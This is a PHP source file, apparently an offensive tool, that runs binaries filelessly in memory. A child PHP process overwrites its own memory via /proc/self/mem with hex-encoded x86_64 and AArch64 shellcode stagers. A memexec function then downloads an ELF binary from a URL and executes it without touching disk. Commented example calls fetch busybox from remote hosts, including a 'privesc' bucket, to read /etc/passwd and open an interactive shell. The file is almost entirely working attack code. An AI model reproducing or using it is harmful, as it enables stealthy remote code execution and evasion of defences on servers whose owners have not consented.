// Code to execute by a php child process to ovewrite it's process with the stager shellcode
$executor='
preg_match("/^.*vdso.*\$/m", file_get_contents("/proc/self/maps"), $matches);
$vdso_addr = substr($matches[0], 0, strpos($matches[0], "-"));
$vdso_dec = hexdec($vdso_addr);
$vdso_addr = bin2hex(strrev(hex2bin($vdso_addr))); // To little endian
$syscall = file_get_contents("/proc/self/syscall");
$syscall_array = explode(" ", $syscall);
$addr_dec = hexdec(trim($syscall_array[8]));
if(php_uname("m") == "x86_64")
{ // x64
    $jmp = hex2bin("48b8". $vdso_addr . "0000ffe0");
    $stager = hex2bin("41b90000000041b8ffffffff41ba22000000ba03000000be00100000bf00000000b8090000000f0589f24889c631c089c70f0531c00f054889f789d6ba0500000066b80a000f05ffe7");
} else { // Aarch64
    $jmp = hex2bin("4000005800001fd6". $vdso_addr . "0000");
    $stager = hex2bin("050080520400801243048052620080520100825200008052c81b8052010000d4e203012ae10300aae807805200008052010000d400008052010000d4e00301aae30301aae103022aa2008052481c8052010000d460001fd6");
}
$fd = fopen("/proc/self/mem", "r+");
fseek($fd, $vdso_dec);
fwrite($fd, $stager);
fseek($fd, $addr_dec);
fwrite($fd, $jmp);
fclose($fd);
';

// Run dhild process
$cmd_array = ['php', '-a'];
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => fopen('php://stdout', 'w'),
    2 => fopen('php://stderr', 'w'),
    3 => fopen('php://stdin' , 'w')
);

$process = proc_open($cmd_array, $descriptorspec, $pipes);
fwrite($pipes[0], $executor);
sleep(1);

// Memexecd shellcodes
if(php_uname("m") == "x86_64")
{
    $shellcode = "554889e54881ec3001000048c745d800000000488d85e8feffff4889c6488d05a50d00004889c7e80a0b0000488945d0488b45d0ba01000000488d0d990d00004889ce4889c7e8b50b0000488b55d04801c2488d85f0feffff4889c64889d7e8d20a0000488945c8488b45c8ba00000000be000040404889c7e865070000488945c0488b95e8feffff488b45d04889d64889c7e80b0d0000488b95f0feffff488b45c84889d64889c7e8f50c0000e9f1060000c745e4010000008b85e0feffff85c00f844b0100008b85e0feffff489848898570ffffff48838570ffffff0f4883a570fffffff04889e2488b8570ffffff48f7d84801d04889c44889e0488945b88b85e0feffff4863d0488b45b8be000000004889c7e87a0c00008b85e0feffff4863d0488b45b84889c6bf00000000e8810c0000488b45b8488945e8eb048345e401488b45e84889c7e8260c00004883c001480145e88b85e0feffff4863d0488b45b84801d0483945e872d28b45e483c001489848c1e00348898568ffffff48838568ffffff0f4883a568fffffff04889e2488b8568ffffff48f7d84801d04889c44889e0488945f0c745e000000000488b45b8488945e8eb338b45e04898488d14c500000000488b45f04801c2488b45e8488902488b45e84889c7e8930b00004883c001480145e88345e0018b45e03b45e47cc58b45e44898488d14c500000000488b45f04801d048c70000000000eb24488d05be0b0000488985d0feffff48c785d8feffff00000000488d85d0feffff488945f0488d85e4feffffba040000004889c6bf00000000e8660b000048c78560ffffff1100000048c78558ffffff0000000048c78550ffffff0000000048c78548ffffff0000000048c78540ffffff000000004c8b8540ffffff4c8b9548ffffff488b9550ffffff488bb558ffffff488bbd60ffffffb8380000000f0585c00f85000400008b85e4feffff48984889c7e8240a0000488945c8488d95f8feffff488b45c8be000040004889c7e8fe040000488945b0488b45c0488b5018488b45c04801d0488945a8488b45c8488b50188b85f8feffff83e00185c00f95c00fb6c0480faf45b04801d0488945a0488b45c80fb740380fb7c048894598488b45c80fb740360fb7c048894590488b45c8488b5020488b45b04801d0488945888b85e4feffff4863d0488b45c84889d64889c7e8390a000041b90000000041b8ffffffffb922000200ba03000000be00100200bf00000000e81c0a000048894580488b4580480500100200488945f848836df808488b45f848c700000000008b45e483e00185c0741048836df808488b45f848c70000000000c745e00000000048816df800040000488b45f848898578ffffff8b45e0489848c1e0044889c2488b8578ffffff4801d048c700060000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801d048c74008001000008b45e0489848c1e0044889c2488b8578ffffff4801d048c700190000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801c2488b45a0488942088b45e0489848c1e0044889c2488b8578ffffff4801d048c700090000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801c2488b45a0488942088b45e0489848c1e0044889c2488b8578ffffff4801d048c700070000008b85f8feffff83e00285c00f94c00fb6d08b45e08d4801894de0489848c1e0044889c1488b8578ffffff4801c14889d0480faf45c0488941088b45e0489848c1e0044889c2488b8578ffffff4801d048c700050000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801c2488b4598488942088b45e0489848c1e0044889c2488b8578ffffff4801d048c700040000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801c2488b4590488942088b45e0489848c1e0044889c2488b8578ffffff4801d048c700030000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801c2488b4588488942088b45e0489848c1e0044889c2488b8578ffffff4801d048c700000000008b45e08d50018955e0489848c1e0044889c2488b8578ffffff4801d048c740080000000048836df808488b45f848c7000000000048836df808488b45f848c700000000008b45e4489848c1e00348f7d8480145f88b45e44898488d14c500000000488b4df0488b45f84889ce4889c7e84b07000048836df8088b45e44863d0488b45f8488910c7853cffffff03000000c78538ffffff00000000ba000000008b8538ffffff48984889c68b853cffffff48984889c7b8240100000f05488b65f88b85f8feffff83e00285c07408488b45a0ffe0eb06488b45a8ffe08b85e0feffff489848898500ffffff48838500ffffff0f4883a500fffffff04889e2488b8500ffffff4801d04889c48b45e483c001489848c1e00348898508ffffff48838508ffffff0f4883a508fffffff04889e2488b8508ffffff4801d04889c4c7852cffffffffffffff48c78520ffffff00000000c7851cffffff0000000048c78510ffffff000000004c8b9510ffffff8b851cffffff48984889c2488bb520ffffff8b852cffffff48984889c7b83d0000000f05b86e0000000f05898534ffffffc78530ffffff120000008b8530ffffff48984889c68b8534ffffff48984889c7b83e0000000f05488d85e0feffffba040000004889c6bf00000000e8f90500004883f8";
    $shellcode .= "040f84ecf8ffffc785fcfeffff000000008b85fcfeffff48984889c7b83c0000000f05554889e54881ecb00000004889bd68ffffff4889b560ffffff48899558ffffff48c745f80000000048c745f000000000488b8568ffffff488945d8488b45d8488b5020488b8568ffffff4801d0488945d0488b45d80fb74038668945ce488b8568ffffffba00000000488d0d8e0500004889ce4889c7e8a2030000488945c04883bd58ffffff007417488b8558ffffff8b0083c80289c2488b8558ffffff8910488b45d80fb740106683f803752c4883bd58ffffff007417488b8558ffffff8b0083c80189c2488b8558ffffff8910488b8560ffffff488945f0c745ec00000000e9530200004883bd58ffffff00743c8b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b0083f8037517488b8558ffffff8b0083e0fd89c2488b8558ffffff89108b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b0083f8010f85e00100008b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b40048945bc8b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4008488945b08b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4010488945a88b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4020488945e08b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4028488945a0488b45a8482500f0ffff488945988b45bcc1e80283e00189c28b45bc83e00209c28b45bcc1e00283e00409d0894594488b45a8482b4598480145e0488b45a8482b4598480145a0488b4598482b45a8480145b0488b55f0488b4598488d3c02488b45a041b90000000041b8ffffffffb932000000ba030000004889c6e83603000048837db0007508488b4598488945f848837dc0007427488b45c0483b4598721d488b5598488b45e04801d0483945c0730c488b45c0482b4598488945e0488b9568ffffff488b45b0488d3402488b55f0488b4598488d0c02488b45e04889c24889cfe8c10200008b4594488b4df0488b55984801ca48895588488b55e04889558089857cffffff8b857cffffff48984889c2488b7580488b7d88b80a0000000f05eb008345ec010fb745ce3945ec0f8ca0fdffff488b55f0488b45f84801d0c9c3554889e54883ec5048897db8488975b0c745d89cffffff488b45b8488945d0c745cc000000008b45cc48984889c2488b75d08b45d848984889c7b8010100000f058945fc8b45fc8945e848c745e000000000c745dc020000008b45dc48984889c2488b45e04889c68b45e848984889c7b8080000000f054889c2488b45b0488910488b45b0488b008b55fc41b9000000004189d0b902000000ba010000004889c6bf00000000e8ca010000488945f08b45fc8945ec8b45ec48984889c7b8030000000f05488b45f0c9c3554889e54883ec5048897dc8488975c08955bc488b45c8488945f0488b45f0488b5028488b45c84801d0488945e8488b45f00fb7403c668945e6488b45f00fb7403e668945e40fb745e448c1e0064889c2488b45e84801d0488b5018488b45c84801d0488945d8c745fc00000000eb6d8b45fc489848c1e0064889c2488b45e84801d08b0089c2488b45d84801c2488b45c04889c64889d7e8e700000085c07538837dbc0074198b45fc489848c1e0064889c2488b45e84801d0488b4018eb2b8b45fc489848c1e0064889c2488b45e84801d0488b4010eb128345fc010fb745e63945fc7c8ab800000000c9c3554889e54883ec3048897dd848c745f00000000048c745f800000000488b45d841b90000000041b8ffffffffb922000000ba030000004889c6bf00000000e87b000000488945e8488b55e8488b45f8488d0c02488b45d84889c24889cebf00000000e862000000488945f0488b45f0480145f8488b45f0482945d848837dd80075c5488b45e8c9c331c031c9ffc9f2aef7d1678d41ffc357e8ebffffff5ff3a60f95c0480fb6c0c331c04889d1f3aac34889d1f3a4c3b80b0000000f05c34c87d1b8090000000f05c3b8000000000f05c34c87d1b8110000000f05c32f70726f632f73656c662f65786500002e696e74657270002e62737300";
    $shellcode = hex2bin($shellcode);
} else {
    $shellcode = "fd7baca9fd030091bf8f00f9a0a30091e10300aa207d0010b0020094a08b00f922008052217d0010a08b40f9dc020094e10300aaa08b40f90000018ba1c30091a6020094a08700f9020080d20108a8d2a08740f9bf010094a08300f9a01740f9e10300aaa08b40f9b1030094a01b40f9e10300aaa08740f9ad030094aa01001420008052a02701b9a02340b91f000071e00b0054a02340b9007c4093a05b00f9a05b40f9003c0091a05b00f9a05b40f900ec7c92a05b00f9e1030091a05b40f9e00300cb2000008b1f000091e0030091a07f00f9a02340b9007c4093e20300aa01008052a07f40f963030094a02340b9007c4093e20300aaa17f40f9000080529d030094a07f40f9a09700f904000014a02741b900040011a02701b9a09740f92103009400040091a19740f92000008ba09700f9a02340b9007c4093a17f40f92000008ba19740f93f0000eb23feff54a02741b900040011007c409300f07dd3a05700f9a05740f9003c0091a05700f9a05740f900ec7c92a05700f9e1030091a05740f9e00300cb2000008b1f000091e0030091a09b00f9bf2301b9a07f40f9a09700f910000014a02381b900f07dd3a19b40f92000008ba19740f9010000f9a09740f9f802009400040091a19740f92000008ba09700f9a02341b900040011a02301b9a12341b9a02741b93f00006bcbfdff54a02781b900f07dd3a19b40f92000008b1f0000f906000014c06d0070a00b00f9bf0f00f9a0430091a09b00f9a0930091820080d2e10300aa0000805251030094200280d2a05300f9bf4f00f9bf4b00f9bf4700f9bf4300f9a44340f9a34740f9a24b40f9a14f40f9a05340f9881b80d2010000d41f000071811f0054a02740b9007c40938a020094a08700f9a0e30091e20300aa0108a0d2a08740f930010094a07b00f9a08340f9000c40f9a18340f92000008ba07700f9a08740f9010c40f9a03b40b9000000121f000071e0079f1a001c0012021c4092a07b40f9407c009b2000008ba07300f9a08740f900704079003c4092a06f00f9a08740f9006c4079003c4092a06b00f9a08740f9001040f9a17b40f92000008ba06700f9a02740b9007c4093e10300aaa08740f903030094050080d204008012430480524300a07262008052010082d24100a0f2000080d201030094a06300f9a06340f900844091a09f00f9a09f40f9002000d1a09f00f9a09f40f91f0000f9a02741b9000000121f000071c0000054a09f40f9002000d1a09f00f9a09f40f91f0000f9bf2301b9a09f40f9000010d1a09f00f9a09f40f9a05f00f9a02381b900ec7cd3a15f40f92000008bc10080d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008b010082d2010400f9a02381b900ec7cd3a15f40f92000008b210380d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba17340f9010400f9a02381b900ec7cd3a15f40f92000008b210180d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba17340f9010400f9a02381b900ec7cd3a15f40f92000008be10080d2010000f9a03b40b900001f121f000071e0179f1a001c0012021c4092a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba18340f9417c019b010400f9a02381b900ec7cd3a15f40f92000008ba10080d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba16f40f9010400f9a02381b900ec7cd3a15f40f92000008b810080d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba16b40f9010400f9a02381b900ec7cd3a15f40f92000008b610080d2010000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008ba16740f9010400f9a02381b900ec7cd3a15f40f92000008b1f0000f9a02341b901040011a12301b9007c409300ec7cd3a15f40f92000008b1f0400f9a09f40f9002000d1a09f00f9a09f40f91f0000f9a09f40f9002000d1a09f00f9a09f40f91f0000f9a02781b900f07dd3e00300cba19f40f92000008ba09f00f9a02781b900f07dd3e20300aaa19b40f9a09f40f937020094a09f40f9002000d1a09f00f9a12781b9a09f40f9010000f960008052a07f00b9bf7b00b9020080d2a07b80b9e10300aaa07f80b9080380d2010000d4a09f40f91f000091a03b40b900001f121f00007180000054a07340f900001fd603000014a07740f900001fd6a02340b9007c4093a02300f9a02340f9003c0091a02300f9a02340f900ec7c92a02300f9e1030091a02340f92000008b1f000091a02741b900040011007c409300f07dd3a02700f9a02740f9003c0091a02700f9a02740f900ec7c92a02700f9e1030091a02740f92000008b1f00009100008012a06f00b9bf3300f9bf5f00b9bf2b00f9a32b40f9a05f80b9e20300aaa13340f9a06f80b9882080d2010000d4a81580d2010000d4a07700b940028052a07300b9a07380b9e10300aaa07780b9281080d2010000d4a0830091820080d2e10300aa00008052100200941f1000f120caff54bf3f00b9a03f80b9a80b80d2010000d4fd7bb4a9fd030091e01700f9e11300f9e20f00f9ff5f00f9ff5b00f9e01740f9e04f00f9e04f40f9001040f9e11740f92000008be04b00f9e04f40f900704079e01f017902008052c1410010e01740f9ff000094e04300f9e00f40f91f0000f1c0000054e00f40f9000040b901001f32e00f40f9010000b9e04f40f9002040791f0c007161010054e00f40f91f0000f1c0000054e00f40f9000040b901000032e00f40";
    $shellcode .= "f9010000b9e01340f9e05b00f9ffaf00b9ac000014e00f40f91f0000f120020054e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000040b91f0c0071c1000054e00f40f9000040b901781e12e00f40f9010000b9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000040b91f04007161110054e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000440b9e07f00b9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000440f9e03b00f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000840f9e03700f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b001040f9e05300f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b001440f9e03300f9e03740f900cc7492e02f00f9e07f40b9007c025301000012e07f40b900001f122100002ae07f40b900741e5300001e122000002ae05700b9e13740f9e02f40f9200000cbe15340f92000008be05300f9e13740f9e02f40f9200000cbe13340f92000008be03300f9e12f40f9e03740f9200000cbe13b40f92000008be03b00f9e15b40f9e02f40f92000008b050080d2040080124306805262008052e13340f958010094e03b40f91f0000f161000054e02f40f9e05f00f9e04340f91f0000f1e0010054e14340f9e02f40f93f0000eb63010054e12f40f9e05340f92000008be14340f93f0000eba2000054e14340f9e02f40f9200000cbe05300f9e15b40f9e02f40f92300008be11740f9e03b40f92000008be25340f9e10300aae00303aa19010094e15b40f9e02f40f92100008be05740b9e12700f9e15340f9e12300f9e03f00b9e03f80b9e20300aae12340f9e02740f9481c80d2010000d401000014e0af40b900040011e0af00b9e01f4179e1af40b93f00006b4beaff54e15b40f9e05f40f92000008bfd7bcca8c0035fd6fd7bbaa9fd030091e00f00f9e10b00f9600c8012e03b00b9e00f40f9e01b00f9ff2f00b9e02f80b9e20300aae11b40f9e03b80b9080780d2010000d4e05f00b9e05f40b9e04b00b9ff2300f940008052e03f00b9e03f80b9e20300aae02340f9e10300aae04b80b9c80780d2010000d4e10300aae00b40f9010000f9e00b40f9000040f9050080d2e45f40b94300805222008052e10300aa000080d2f5000094e02b00f9e05f40b9e04f00b9e04f80b9280780d2010000d4e02b40f9fd7bc6a8c0035fd6fd7bbaa9fd030091e01700f9e11300f9e21f00b9e01740f9e02b00f9e02b40f9001440f9e11740f92000008be02700f9e02b40f900784079e08f0079e02b40f9007c4079e08b0079e08b407900e47ad3e12740f92000008b000c40f9e11740f92000008be01f00f9ff5f00b91f000014e05f80b900e47ad3e12740f92000008b000040b9e003002ae11f40f92000008be11340f96d0000941f00007101020054e01f40b91f000071e0000054e05f80b900e47ad3e12740f92000008b000c40f90f000014e05f80b900e47ad3e12740f92000008b000840f909000014e05f40b900040011e05f00b9e08f4079e15f40b93f00006bebfbff54000080d2fd7bc6a8c0035fd6fd7bbca9fd030091e00f00f9ff1b00f9ff1f00f9050080d2040080124304805262008052e10f40f9000080d29f000094e01700f9e11740f9e01f40f92000008be20f40f9e10300aa00008052a2000094e01b00f9e11f40f9e01b40f92000008be01f00f9e10f40f9e01b40f9200000cbe00f00f9e00f40f91f0000f1c1fdff54e01740f9fd7bc4a8c0035fd6ff4300d1e00700f9e00740f9003c0091e00700f9e00740f900ec7c92e00700f9e1030091e00740f9e00300cb2000008b1f000091e0030091ff430091c0035fd6ff4300d1e00700f9e00740f9003c0091e00700f9e00740f900ec7c92e00700f9e1030091e00740f92000008b1f000091ff430091c0035fd6ff8300d1e00700f9ff0f00f904000014e00f40f900040091e00f00f9e10740f9e00f40f92000008b000040391f00007101ffff54e00f40f9ff830091c0035fd6ff8300d1e00700f9e10300f9ff0f00f904000014e00f40f900040091e00f00f9e10740f9e00f40f92000008b00004039e203002ae10340f9e00f40f92000008b000040394000004be01700b91f000071a1010054e10740f9e00f40f92000008b000040391f000071e0000054e10340f9e00f40f92000008b000040391f000071a1fcff54e01740b9ff830091c0035fd6ffc300d1e00f00f9e11700b9e20700f9ff1700f90a000014e01740f9e10f40f92000008be11740b9211c001201000039e01740f900040091e01700f9e01740f9e10740f93f0000eb88feff54e00f40f9ffc30091c0035fd6ffc300d1e00f00f9e10b00f9e20700f9ff1700f90c000014e01740f9e10b40f92100008be01740f9e20f40f94000008b2100403901000039e01740f900040091e01700f9e01740f9e10740f93f0000eb48feff54e00f40f9ffc30091c0035fd6ff4300d1e00700f9e10300f9e81a80d2010000d4ff430091c0035fd6ffc300d1e01700f9e11300f9e21f00b9e31b00b9e41700b9e50700f9c81b80d2010000d4ffc30091c0035fd6ff8300d1e01f00b9e10b00f9e20700f9e80780d2010000d4ff830091c0035fd6ff8300d1e01f00b9e10b00f9e20700f9e30300f9680880d2010000d4ff830091c0035fd62f70726f632f73656c662f65786500002e696e74657270002e62737300";
    $shellcode = hex2bin($shellcode);
}

// Send sc to the child php process so it's run by the stager
fwrite($pipes[0], $shellcode);

// Prepare memexec function
$GLOBALS['pipe'] = $pipes[0];
function memexec($url, $argv = [], $stop = true)
{
    $args = "";
    foreach($argv as &$arg)
        $args .= $arg . "\0";
    unset($arg);

    $f = fopen($url, "r");
    $binary = "";
    while(!feof($f))
        $binary .= fread($f, 2048);
    fclose($f);

    $args = pack('V', strlen($args)) . $args . pack('V', strlen($binary));
    fwrite($GLOBALS['pipe'], $args);
    fwrite($GLOBALS['pipe'], $binary);
    if($stop) posix_kill(posix_getpid(), 19);
}

// memexec("https://privesc.s3.eu-west-1.amazonaws.com/memexec/busybox", ["ls", "-la", "/"], false); //PIE
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["ls", "-la", "/"], false); // No PIE
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["cat", "/etc/passwd"], false);
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["sh","-i"], true);